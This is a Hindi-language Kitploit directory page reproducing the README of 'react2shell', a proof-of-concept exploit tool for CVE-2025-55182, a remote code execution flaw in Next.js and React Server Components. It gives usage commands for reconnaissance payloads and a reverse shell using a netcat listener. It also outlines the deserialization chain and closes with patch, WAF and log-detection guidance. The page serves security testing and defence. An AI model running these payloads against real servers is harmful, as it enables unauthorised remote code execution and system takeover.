Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
react2shell — भेद्यता CVE-2025-55182 का शोषण करने के लिए एक संपूर्ण फ्रेमवर्क | Kitploit
उपकरण/GitHubGitHub/zr0n/react2shell
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubzr0n/react2shell

react2shell

भेद्यता CVE-2025-55182 का शोषण करने के लिए एक संपूर्ण फ्रेमवर्क

रिपॉजिटरी देखें
1058 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

React2Shell - CVE-2025-55182 शोषण PoC

Security Platform License

यह CVE-2025-55182 के लिए एक proof-of-concept शोषण है, जो React Server Components का उपयोग करने वाले Next.js अनुप्रयोगों में एक गंभीर Remote Code Execution भेद्यता है।

⚠️ अस्वीकरण

यह टूल केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए है।

  • ❌ उन प्रणालियों के विरुद्ध उपयोग न करें जिनके मालिक आप नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति आपके पास नहीं है
  • ❌ कंप्यूटर प्रणालियों तक अनधिकृत पहुँच अवैध है
  • ✅ केवल नियंत्रित वातावरण में सीखने और अधिकृत पैठ परीक्षण के लिए उपयोग करें
  • ✅ लेखक इस टूल के दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है

📋 भेद्यता विवरण

  • CVE ID: CVE-2025-55182
  • भेद्यता: React Server Components में Remote Code Execution
  • प्रभावित संस्करण:
    • Next.js: ≥14.3.0-canary.77, App Router के साथ सभी 15.x और 16.x संस्करण
    • React: 19.0, 19.1.0, 19.1.1, 19.2.0
  • पैच किए गए संस्करण:
    • Next.js: 16.0.7, 15.5.7, 15.4.8, 15.3.6, 15.2.6, 15.1.9, 15.0.5
    • React: 19.0.1, 19.1.2, 19.2.1
  • CVSS स्कोर: गंभीर
  • हमला वेक्टर: नेटवर्क-आधारित, तैयार किए गए POST अनुरोध की आवश्यकता है

🎯 विशेषताएँ

  • ✅ क्रॉस-प्लेटफ़ॉर्म समर्थन (Windows और Linux)
  • ✅ एकाधिक पेलोड प्रकार
  • ✅ रिवर्स शेल क्षमताएँ
  • ✅ विज़ुअल प्रूफ पेलोड (calc, notepad)
  • ✅ फ़ाइल सिस्टम संचालन
  • ✅ सिस्टम जानकारी एकत्र करना

🔧 स्थापना

root@kitploit:~
# Clone or download this repository
git clone https://github.com/zr0n/react2shell
cd react2shell

# Install dependencies
npm install form-data

💻 उपयोग

मूल वाक्यविन्यास

root@kitploit:~
node react2shell.js <target_url> <payload_type> [options]

उपलब्ध पेलोड

उदाहरण

1. बुनियादी Proof of Concept

root@kitploit:~
node react2shell.js http://localhost:3000 basic
# Check server console for output: EXPLOITED: 50

2. सिस्टम टोही

root@kitploit:~
# Get current user
node react2shell.js http://localhost:3000 whoami

# List files
node react2shell.js http://localhost:3000 dir

# System information
node react2shell.js http://localhost:3000 systeminfo

3. विज़ुअल प्रूफ (Windows)

root@kitploit:~
# Launch calculator
node react2shell.js http://localhost:3000 calc

# Launch notepad
node react2shell.js http://localhost:3000 notepad

4. फ़ाइल निर्माण प्रूफ

root@kitploit:~
node react2shell.js http://localhost:3000 file
# Check server directory for EXPLOITED.txt

5. रिवर्स शेल

root@kitploit:~
# Terminal 1: Start listener
nc -lvnp 4444

# Terminal 2: Execute exploit
node react2shell.js http://localhost:3000 shell <YOUR_IP> 4444

# Works on both Windows (PowerShell) and Linux (Bash)

🏗️ भेद्य वातावरण की स्थापना

पूर्वापेक्षाएँ

  • Node.js 18+
  • npm या yarn

भेद्य Next.js अनुप्रयोग बनाएँ

root@kitploit:~
# Create project directory
mkdir vulnerable-nextjs-app
cd vulnerable-nextjs-app

# Initialize Next.js with vulnerable version
npx create-next-app@latest . --ts --app --no-eslint --tailwind

# Downgrade to vulnerable version
npm install [email protected]

# Install dependencies
npm install

न्यूनतम भेद्य ऐप (app/page.tsx)

root@kitploit:~
export default function Home() {
  return (
    <div className="p-8">
      <h1 className="text-4xl font-bold">Vulnerable Next.js App</h1>
      <p className="mt-4">This app is vulnerable to CVE-2025-55182</p>
    </div>
  );
}

सर्वर प्रारंभ करें

root@kitploit:~
npm run dev
# Server runs on http://localhost:3000

🔍 यह कैसे काम करता है

यह शोषण React Server Components में एक deserialization भेद्यता का लाभ उठाता है:

  1. पेलोड निर्माण: प्रोटोटाइप प्रदूषण के साथ एक दुर्भावनापूर्ण क्रमबद्ध वस्तु बनाता है
  2. Function Constructor एक्सेस: Function Constructor तक पहुँचने के लिए constructor.constructor का शोषण करता है
  3. कोड इंजेक्शन: _prefix फ़ील्ड के माध्यम से मनमाना JavaScript कोड इंजेक्ट करता है
  4. निष्पादन: सर्वर पेलोड को deserialize करता है और इंजेक्ट किए गए कोड को निष्पादित करता है

तकनीकी विवरण

root@kitploit:~
// Simplified vulnerability chain
{
  _formData: {
    get: '$3:constructor:constructor' // Access Function constructor
  },
  _prefix: 'YOUR_CODE_HERE//' // Injected code
}

🛡️ शमन

अनुप्रयोग स्वामियों के लिए

  1. तुरंत अपडेट करें:

    root@kitploit:~
    npm update next@latest
    npm update react@latest react-dom@latest
    
  2. पैच किए गए संस्करण सत्यापित करें:

    root@kitploit:~
    npm list next react
    
  3. आवश्यक संस्करण:

    • Next.js: ≥16.0.7 या ≥15.5.7
    • React: ≥19.2.1 या ≥19.1.2

सुरक्षा टीमों के लिए

  • अपने इंफ्रास्ट्रक्चर में भेद्य Next.js संस्करणों के लिए स्कैन करें
  • दुर्भावनापूर्ण RSC पेलोड का पता लगाने के लिए Web Application Firewall (WAF) नियम लागू करें
  • next-action हेडर वाले संदिग्ध POST अनुरोधों की निगरानी करें
  • अप्रत्याशित कोड निष्पादन पैटर्न के लिए सर्वर-साइड लॉग की समीक्षा करें

📊 पता लगाना

WAF नियम

निम्नलिखित के साथ POST अनुरोधों की तलाश करें:

  • हेडर: next-action
  • Content-Type: multipart/form-data
  • बॉडी जिसमें शामिल है: constructor, _prefix, _formData

लॉग पैटर्न

root@kitploit:~
POST / with next-action header
Suspicious FormData keys: 0, 1, 2, 3, 4
Response: 200 (successful exploitation) or 500 (failed)

📚 संदर्भ

  • CVE-2025-55182 - NVD
  • Next.js Security Advisories
  • React Security Updates
  • OWASP Code Injection

🤝 योगदान

यह एक शैक्षिक उपकरण है। ऐसे योगदान जो निम्नलिखित में सुधार करते हैं:

  • पता लगाने की क्षमताएँ
  • दस्तावेज़ीकरण
  • रक्षात्मक रणनीतियाँ
  • शैक्षिक सामग्री

का स्वागत है। ऐसे योगदान जमा न करें जो आक्रमण क्षमताओं को बढ़ाते हैं।

📜 लाइसेंस

केवल शैक्षिक उपयोग - कोई वारंटी प्रदान नहीं की जाती है

👤 लेखक

Luiz Fernando Ziron साइबर सुरक्षा शिक्षा और जागरूकता उद्देश्यों के लिए बनाया गया।

⚖️ कानूनी नोटिस

इस टूल का उपयोग करके, आप निम्नलिखित के लिए सहमत हैं:

  • इसका उपयोग केवल उन प्रणालियों पर करें जिनके मालिक आप हैं या जिनके परीक्षण की स्पष्ट लिखित अनुमति आपके पास है
  • अपने कार्यों की पूरी जिम्मेदारी लें
  • लेखक को किसी भी दुरुपयोग या क्षति के लिए उत्तरदायी न ठहराएँ
  • सभी लागू कानूनों और विनियमों का पालन करें

अधिकांश क्षेत्राधिकारों में कंप्यूटर प्रणालियों तक अनधिकृत पहुँच एक अपराध है।


सुरक्षित रहें, नैतिक रहें, कानूनी रहें। 🔒

टूल डाउनलोड करें
पेलोडविवरणउदाहरण
basicगणितीय proof of concept (7*7+1=50)node react2shell.js http://target:3000 basic
whoamiवर्तमान सिस्टम उपयोगकर्ता दिखाएँnode react2shell.js http://target:3000 whoami
dirवर्तमान निर्देशिका की सामग्री सूचीबद्ध करेंnode react2shell.js http://target:3000 dir
systeminfoऑपरेटिंग सिस्टम जानकारी दिखाएँnode react2shell.js http://target:3000 systeminfo
fileEXPLOITED.txt प्रूफ फ़ाइल बनाएँnode react2shell.js http://target:3000 file
calcकैलकुलेटर लॉन्च करें (Windows विज़ुअल प्रूफ)node react2shell.js http://target:3000 calc
notepadनोटपैड लॉन्च करें (Windows विज़ुअल प्रूफ)node react2shell.js http://target:3000 notepad
shellरिवर्स शेल (Windows/Linux स्वतः पहचान)node react2shell.js http://target:3000 shell 10.10.10.5 4444